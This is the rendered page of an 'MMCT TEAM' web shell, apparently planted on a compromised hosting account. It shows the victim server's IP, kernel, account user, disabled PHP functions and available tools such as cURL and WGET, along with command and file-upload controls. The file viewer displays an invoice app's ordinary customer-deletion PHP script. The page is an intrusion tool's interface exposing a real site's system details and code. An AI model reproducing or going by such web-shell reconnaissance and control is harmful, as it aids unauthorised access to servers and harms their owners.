MMCT TEAM
Server IP : 217.21.85.138  /  Your IP : 216.73.216.103
Web Server : LiteSpeed
System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u915722082 ( 915722082)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u915722082/.nvm/../public_html/invoice/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u915722082/.nvm/../public_html/invoice/ajax_delete_customer.php
<?php
session_start();
require_once 'db.php';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'delete') {
    $id = intval($_POST['id']);

    if ($id > 0) {
        try {
            $con->autocommit(false);

            // Check if the customer has associated products in cus_product
            $checkQuery = "SELECT COUNT(*) as count FROM cus_product WHERE cid = $id";
            $result = $con->query($checkQuery);
            $row = $result->fetch_assoc();

            if ($row['count'] > 0) {
                echo json_encode([
                    "status" => "error",
                    "message" => "Cannot delete customer. Associated products exist."
                ]);
                exit;
            }

            // Delete customer-related records
            $deleteCustomer = "DELETE FROM customers WHERE id = $id";
            $con->query($deleteCustomer);

            $deleteAddress = "DELETE FROM customer_addresses WHERE customer_id = $id";
            $con->query($deleteAddress);

            $con->commit();

            echo json_encode([
                "status" => "success",
                "message" => "Customer deleted successfully."
            ]);

        } catch (Exception $e) {
            $con->rollback();
            echo json_encode([
                "status" => "error",
                "message" => "Error deleting customer: " . $e->getMessage()
            ]);
        }
    } else {
        echo json_encode([
            "status" => "error",
            "message" => "Invalid customer ID."
        ]);
    }
} else {
    echo json_encode([
        "status" => "error",
        "message" => "Invalid request."
    ]);
}
?>

MMCT - 2023